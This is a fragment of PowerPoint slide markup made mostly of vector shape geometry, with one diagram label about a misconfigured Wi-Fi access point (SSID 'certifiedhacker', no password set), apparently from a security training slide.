                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="41"/>
                      <a:pt x="94" y="34"/>
                      <a:pt x="94" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="14"/>
                      <a:pt x="74" y="0"/>
                      <a:pt x="54" y="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accent1"/>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:schemeClr val="accent1">
                      <a:gamma/>
                      <a:shade val="85882"/>
                      <a:invGamma/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="accent1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290" name="Group 2076">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1EED100-0F95-4240-8125-16B17756C5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23" y="2601"/>
                <a:ext cx="257" cy="202"/>
                <a:chOff x="1315" y="1508"/>
                <a:chExt cx="596" cy="469"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2292" name="Freeform 2077">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5973C746-11EA-476B-B0E1-03AFD61463F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315" y="1508"/>
                  <a:ext cx="596" cy="161"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 904"/>
                    <a:gd name="T1" fmla="*/ 123 h 244"/>
                    <a:gd name="T2" fmla="*/ 451 w 904"/>
                    <a:gd name="T3" fmla="*/ 0 h 244"/>
                    <a:gd name="T4" fmla="*/ 904 w 904"/>
                    <a:gd name="T5" fmla="*/ 123 h 244"/>
                    <a:gd name="T6" fmla="*/ 451 w 904"/>
                    <a:gd name="T7" fmla="*/ 244 h 244"/>
                    <a:gd name="T8" fmla="*/ 0 w 904"/>
                    <a:gd name="T9" fmla="*/ 123 h 2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rgbClr val="FF993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93" name="Freeform 2078">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17B9EADF-F99C-4E55-95C0-3478D0245F3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12" y="1589"/>
                  <a:ext cx="299" cy="388"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 453"/>
                    <a:gd name="T1" fmla="*/ 589 h 589"/>
                    <a:gd name="T2" fmla="*/ 0 w 453"/>
                    <a:gd name="T3" fmla="*/ 121 h 589"/>
                    <a:gd name="T4" fmla="*/ 453 w 453"/>
                    <a:gd name="T5" fmla="*/ 0 h 589"/>
                    <a:gd name="T6" fmla="*/ 453 w 453"/>
                    <a:gd name="T7" fmla="*/ 468 h 589"/>
                    <a:gd name="T8" fmla="*/ 0 w 453"/>
                    <a:gd name="T9" fmla="*/ 589 h 5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rgbClr val="FF993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94" name="Freeform 2079">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF999AAC-2621-4B47-ACA5-51F07196A4E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315" y="1589"/>
                  <a:ext cx="297" cy="388"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 451"/>
                    <a:gd name="T1" fmla="*/ 0 h 589"/>
                    <a:gd name="T2" fmla="*/ 0 w 451"/>
                    <a:gd name="T3" fmla="*/ 468 h 589"/>
                    <a:gd name="T4" fmla="*/ 451 w 451"/>
                    <a:gd name="T5" fmla="*/ 589 h 589"/>
                    <a:gd name="T6" fmla="*/ 451 w 451"/>
                    <a:gd name="T7" fmla="*/ 121 h 589"/>
                    <a:gd name="T8" fmla="*/ 0 w 451"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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993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291" name="Freeform 2080">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88D49AEA-0767-4933-ADC5-E62097CDF71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994" y="2703"/>
                <a:ext cx="121" cy="72"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 75 w 91"/>
                  <a:gd name="T1" fmla="*/ 0 h 54"/>
                  <a:gd name="T2" fmla="*/ 27 w 91"/>
                  <a:gd name="T3" fmla="*/ 14 h 54"/>
                  <a:gd name="T4" fmla="*/ 40 w 91"/>
                  <a:gd name="T5" fmla="*/ 46 h 54"/>
                  <a:gd name="T6" fmla="*/ 91 w 91"/>
                  <a:gd name="T7" fmla="*/ 3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1" h="54">
                    <a:moveTo>
                      <a:pt x="75" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="4"/>
                      <a:pt x="45" y="9"/>
                      <a:pt x="27" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="22"/>
                      <a:pt x="17" y="54"/>
                      <a:pt x="40" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="44"/>
                      <a:pt x="65" y="38"/>
                      <a:pt x="91" y="32"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:gradFill rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent1"/>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:schemeClr val="accent1">
                      <a:gamma/>
                      <a:shade val="85882"/>
                      <a:invGamma/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:schemeClr val="accent1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2077" name="Rectangle 2076">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A16EC54A-2A0D-46EE-9EF6-27E58F411C4E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="609600" y="2928335"/>
              <a:ext cx="2477588" cy="71558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Access Point Misconfigured</a:t>
              </a:r>
            </a:p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3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SSID: </a:t>
              </a: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certifiedhacker</a:t>
              </a:r>
            </a:p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Wi-Fi password not configured</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="120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078" name="Group 1762">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADEEBB8F-9D94-49B0-967C-224754135C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0817" y="1047750"/>
              <a:ext cx="457200" cy="438150"/>
              <a:chOff x="3104" y="2602"/>
              <a:chExt cx="288" cy="276"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2267" name="Freeform 1763">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EFD0E55-360B-4264-93BC-0DFDFFBA3AD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04" y="2602"/>
                <a:ext cx="288" cy="276"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T1" fmla="*/ 359 h 1285"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 1285 h 1285"/>
                  <a:gd name="T4" fmla="*/ 0 w 1344"/>
                  <a:gd name="T5" fmla="*/ 924 h 1285"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 0 h 1285"/>
                  <a:gd name="T8" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T9" fmla="*/ 359 h 1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1285">
                    <a:moveTo>
                      <a:pt x="1344" y="359"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="1285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="3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68" name="Freeform 1764">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A889B07-FFDD-4E50-A834-C11E2C2E41B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32" y="2686"/>
                <a:ext cx="37" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 172 w 172"/>
                  <a:gd name="T1" fmla="*/ 227 h 227"/>
                  <a:gd name="T2" fmla="*/ 172 w 172"/>
                  <a:gd name="T3" fmla="*/ 45 h 227"/>
                  <a:gd name="T4" fmla="*/ 0 w 172"/>
                  <a:gd name="T5" fmla="*/ 0 h 227"/>
                  <a:gd name="T6" fmla="*/ 0 w 172"/>
                  <a:gd name="T7" fmla="*/ 180 h 227"/>
                  <a:gd name="T8" fmla="*/ 172 w 172"/>
                  <a:gd name="T9" fmla="*/ 22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2" h="227">
                    <a:moveTo>
                      <a:pt x="172" y="227"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="172" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="22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1B171B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69" name="Freeform 1765">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C36AFFFA-AF32-420E-8FD8-470885A0854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95" y="2676"/>
                <a:ext cx="37" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 175"/>
                  <a:gd name="T1" fmla="*/ 227 h 227"/>
                  <a:gd name="T2" fmla="*/ 175 w 175"/>
                  <a:gd name="T3" fmla="*/ 47 h 227"/>
                  <a:gd name="T4" fmla="*/ 0 w 175"/>
                  <a:gd name="T5" fmla="*/ 0 h 227"/>
                  <a:gd name="T6" fmla="*/ 0 w 175"/>
                  <a:gd name="T7" fmla="*/ 179 h 227"/>
                  <a:gd name="T8" fmla="*/ 175 w 175"/>
                  <a:gd name="T9" fmla="*/ 22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5" h="227">
                    <a:moveTo>
                      <a:pt x="175" y="227"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="175" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="227"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="6350" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="1B171B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70" name="Freeform 1766">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8393C12-85DE-4857-88AA-9B45DCE60F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57" y="2666"/>
                <a:ext cx="38" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 175"/>
                  <a:gd name="T1" fmla="*/ 226 h 226"/>
                  <a:gd name="T2" fmla="*/ 175 w 175"/>
                  <a:gd name="T3" fmla="*/ 47 h 226"/>
                  <a:gd name="T4" fmla="*/ 0 w 175"/>
                  <a:gd name="T5" fmla="*/ 0 h 226"/>
                  <a:gd name="T6" fmla="*/ 0 w 175"/>
                  <a:gd name="T7" fmla="*/ 179 h 226"/>
                  <a:gd name="T8" fmla="*/ 175 w 175"/>
                  <a:gd name="T9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5" h="226">
                    <a:moveTo>
                      <a:pt x="175" y="226"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="175" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="22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1B171B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71" name="Freeform 1767">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BCB3692-DAAC-4142-BB5A-D549925B637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20" y="2656"/>
                <a:ext cx="37" cy="48"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 175"/>
                  <a:gd name="T1" fmla="*/ 227 h 227"/>
                  <a:gd name="T2" fmla="*/ 175 w 175"/>
                  <a:gd name="T3" fmla="*/ 48 h 227"/>
                  <a:gd name="T4" fmla="*/ 0 w 175"/>
                  <a:gd name="T5" fmla="*/ 0 h 227"/>
                  <a:gd name="T6" fmla="*/ 0 w 175"/>
                  <a:gd name="T7" fmla="*/ 182 h 227"/>
                  <a:gd name="T8" fmla="*/ 175 w 175"/>
                  <a:gd name="T9" fmla="*/ 22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5" h="227">
                    <a:moveTo>
                      <a:pt x="175" y="227"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="175" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="22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1B171B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72" name="Freeform 1768">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{994C4BFE-4DCD-4660-96A4-DDC36CB35EC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32" y="2725"/>
                <a:ext cx="37" cy="48"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 172 w 172"/>
                  <a:gd name="T1" fmla="*/ 226 h 226"/>
                  <a:gd name="T2" fmla="*/ 172 w 172"/>
                  <a:gd name="T3" fmla="*/ 47 h 226"/>
                  <a:gd name="T4" fmla="*/ 0 w 172"/>
                  <a:gd name="T5" fmla="*/ 0 h 226"/>
                  <a:gd name="T6" fmla="*/ 0 w 172"/>
                  <a:gd name="T7" fmla="*/ 179 h 226"/>
                  <a:gd name="T8" fmla="*/ 172 w 172"/>
                  <a:gd name="T9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2" h="226">
                    <a:moveTo>
                      <a:pt x="172" y="226"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="172" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="226"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="6350" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="1B171B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73" name="Freeform 1769">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A470FFF-6389-4A4B-8EF2-74E4CDBD45D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95" y="2715"/>
                <a:ext cx="37" cy="48"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 175"/>
                  <a:gd name="T1" fmla="*/ 227 h 227"/>
                  <a:gd name="T2" fmla="*/ 175 w 175"/>
                  <a:gd name="T3" fmla="*/ 48 h 227"/>
                  <a:gd name="T4" fmla="*/ 0 w 175"/>
                  <a:gd name="T5" fmla="*/ 0 h 227"/>
                  <a:gd name="T6" fmla="*/ 0 w 175"/>
                  <a:gd name="T7" fmla="*/ 182 h 227"/>
                  <a:gd name="T8" fmla="*/ 175 w 175"/>
                  <a:gd name="T9" fmla="*/ 22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5" h="227">
                    <a:moveTo>
                      <a:pt x="175" y="227"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="175" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="22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1B171B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74" name="Freeform 1770">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7F6CFC6-0042-4876-BAA2-13AFB660BF4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57" y="2704"/>
                <a:ext cx="38" cy="50"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 175"/>
                  <a:gd name="T1" fmla="*/ 229 h 229"/>
                  <a:gd name="T2" fmla="*/ 175 w 175"/>
                  <a:gd name="T3" fmla="*/ 47 h 229"/>
                  <a:gd name="T4" fmla="*/ 0 w 175"/>
                  <a:gd name="T5" fmla="*/ 0 h 229"/>
                  <a:gd name="T6" fmla="*/ 0 w 175"/>
                  <a:gd name="T7" fmla="*/ 182 h 229"/>
                  <a:gd name="T8" fmla="*/ 175 w 175"/>
                  <a:gd name="T9" fmla="*/ 229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5" h="229">
                    <a:moveTo>
                      <a:pt x="175" y="229"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="175" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="229"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:ln w="6350" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="1B171B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75" name="Freeform 1771">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEA71EF5-41FB-4390-B6D9-F51DC9B9F9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20" y="2695"/>
                <a:ext cx="37" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 175"/>
                  <a:gd name="T1" fmla="*/ 227 h 227"/>
                  <a:gd name="T2" fmla="*/ 175 w 175"/>
                  <a:gd name="T3" fmla="*/ 45 h 227"/>
                  <a:gd name="T4" fmla="*/ 0 w 175"/>
                  <a:gd name="T5" fmla="*/ 0 h 227"/>
                  <a:gd name="T6" fmla="*/ 0 w 175"/>
                  <a:gd name="T7" fmla="*/ 180 h 227"/>
                  <a:gd name="T8" fmla="*/ 175 w 175"/>
                  <a:gd name="T9" fmla="*/ 22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5" h="227">
                    <a:moveTo>
                      <a:pt x="175" y="227"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="175" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="22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1B171B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76" name="Freeform 1772">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3A89D14-2706-4EA5-A682-1A5928E37F1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32" y="2763"/>
                <a:ext cx="37" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 172 w 172"/>
                  <a:gd name="T1" fmla="*/ 229 h 229"/>
                  <a:gd name="T2" fmla="*/ 172 w 172"/>
                  <a:gd name="T3" fmla="*/ 47 h 229"/>
                  <a:gd name="T4" fmla="*/ 0 w 172"/>
                  <a:gd name="T5" fmla="*/ 0 h 229"/>
                  <a:gd name="T6" fmla="*/ 0 w 172"/>
                  <a:gd name="T7" fmla="*/ 182 h 229"/>
                  <a:gd name="T8" fmla="*/ 172 w 172"/>
                  <a:gd name="T9" fmla="*/ 229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2" h="229">
                    <a:moveTo>
                      <a:pt x="172" y="229"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="172" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="229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1B171B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77" name="Freeform 1773">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AAE9065-3C7C-4666-8289-99F3AD54D77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95" y="2754"/>
                <a:ext cx="37" cy="48"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 175"/>
                  <a:gd name="T1" fmla="*/ 227 h 227"/>
                  <a:gd name="T2" fmla="*/ 175 w 175"/>
                  <a:gd name="T3" fmla="*/ 45 h 227"/>
                  <a:gd name="T4" fmla="*/ 0 w 175"/>
                  <a:gd name="T5" fmla="*/ 0 h 227"/>
                  <a:gd name="T6" fmla="*/ 0 w 175"/>
                  <a:gd name="T7" fmla="*/ 180 h 227"/>
                  <a:gd name="T8" fmla="*/ 175 w 175"/>
                  <a:gd name="T9" fmla="*/ 22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5" h="227">
                    <a:moveTo>
                      <a:pt x="175" y="227"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="175" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="22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1B171B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78" name="Freeform 1774">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02E9AB77-7589-411D-9CC9-242C64F4643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57" y="2744"/>
                <a:ext cx="38" cy="48"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 175"/>
                  <a:gd name="T1" fmla="*/ 227 h 227"/>
                  <a:gd name="T2" fmla="*/ 175 w 175"/>
                  <a:gd name="T3" fmla="*/ 47 h 227"/>
                  <a:gd name="T4" fmla="*/ 0 w 175"/>
                  <a:gd name="T5" fmla="*/ 0 h 227"/>
                  <a:gd name="T6" fmla="*/ 0 w 175"/>
                  <a:gd name="T7" fmla="*/ 180 h 227"/>
                  <a:gd name="T8" fmla="*/ 175 w 175"/>
                  <a:gd name="T9" fmla="*/ 22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5" h="227">
                    <a:moveTo>
                      <a:pt x="175" y="227"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="175" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="22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1B171B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79" name="Freeform 1775">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A5DC43E-ABF0-424D-84F3-34D3B834091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20" y="2733"/>
                <a:ext cx="37" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 175"/>
                  <a:gd name="T1" fmla="*/ 227 h 227"/>
                  <a:gd name="T2" fmla="*/ 175 w 175"/>
                  <a:gd name="T3" fmla="*/ 47 h 227"/>
                  <a:gd name="T4" fmla="*/ 0 w 175"/>
                  <a:gd name="T5" fmla="*/ 0 h 227"/>
                  <a:gd name="T6" fmla="*/ 0 w 175"/>
                  <a:gd name="T7" fmla="*/ 179 h 227"/>
                  <a:gd name="T8" fmla="*/ 175 w 175"/>
                  <a:gd name="T9" fmla="*/ 22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5" h="227">
                    <a:moveTo>
                      <a:pt x="175" y="227"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="175" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="22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1B171B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80" name="Freeform 1776">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06E7C867-4DFB-48DD-89A0-FB79D3C0347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32" y="2802"/>
                <a:ext cx="37" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 172 w 172"/>
                  <a:gd name="T1" fmla="*/ 227 h 227"/>
                  <a:gd name="T2" fmla="*/ 172 w 172"/>
                  <a:gd name="T3" fmla="*/ 47 h 227"/>
                  <a:gd name="T4" fmla="*/ 0 w 172"/>
                  <a:gd name="T5" fmla="*/ 0 h 227"/>
                  <a:gd name="T6" fmla="*/ 0 w 172"/>
                  <a:gd name="T7" fmla="*/ 180 h 227"/>
                  <a:gd name="T8" fmla="*/ 172 w 172"/>
                  <a:gd name="T9" fmla="*/ 22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2" h="227">
                    <a:moveTo>
                      <a:pt x="172" y="227"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="172" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="22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1B171B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81" name="Freeform 1777">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B225AEFC-4092-4660-84E9-918DE7B15F2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95" y="2792"/>
                <a:ext cx="37" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 175"/>
                  <a:gd name="T1" fmla="*/ 227 h 227"/>
                  <a:gd name="T2" fmla="*/ 175 w 175"/>
                  <a:gd name="T3" fmla="*/ 47 h 227"/>
                  <a:gd name="T4" fmla="*/ 0 w 175"/>
                  <a:gd name="T5" fmla="*/ 0 h 227"/>
                  <a:gd name="T6" fmla="*/ 0 w 175"/>
                  <a:gd name="T7" fmla="*/ 179 h 227"/>
                  <a:gd name="T8" fmla="*/ 175 w 175"/>
                  <a:gd name="T9" fmla="*/ 22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5" h="227">
                    <a:moveTo>
                      <a:pt x="175" y="227"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="175" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="22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1B171B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82" name="Freeform 1778">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC9D1C57-0B0B-42D6-AAB2-7F89BDA4866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57" y="2782"/>
                <a:ext cx="38" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 175 w 175"/>
                  <a:gd name="T1" fmla="*/ 226 h 226"/>
                  <a:gd name="T2" fmla="*/ 175 w 175"/>
                  <a:gd name="T3" fmla="*/ 47 h 226"/>
                  <a:gd name="T4" fmla="*/ 0 w 175"/>
                  <a:gd name="T5" fmla="*/ 0 h 226"/>
                  <a:gd name="T6" fmla="*/ 0 w 175"/>
                  <a:gd name="T7" fmla="*/ 182 h 226"/>
                  <a:gd name="T8" fmla="*/ 175 w 175"/>
                  <a:gd name="T9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5" h="226">
                    <a:moveTo>
                      <a:pt x="175" y="226"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="175" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="182"/>
                    </a:lnTo>
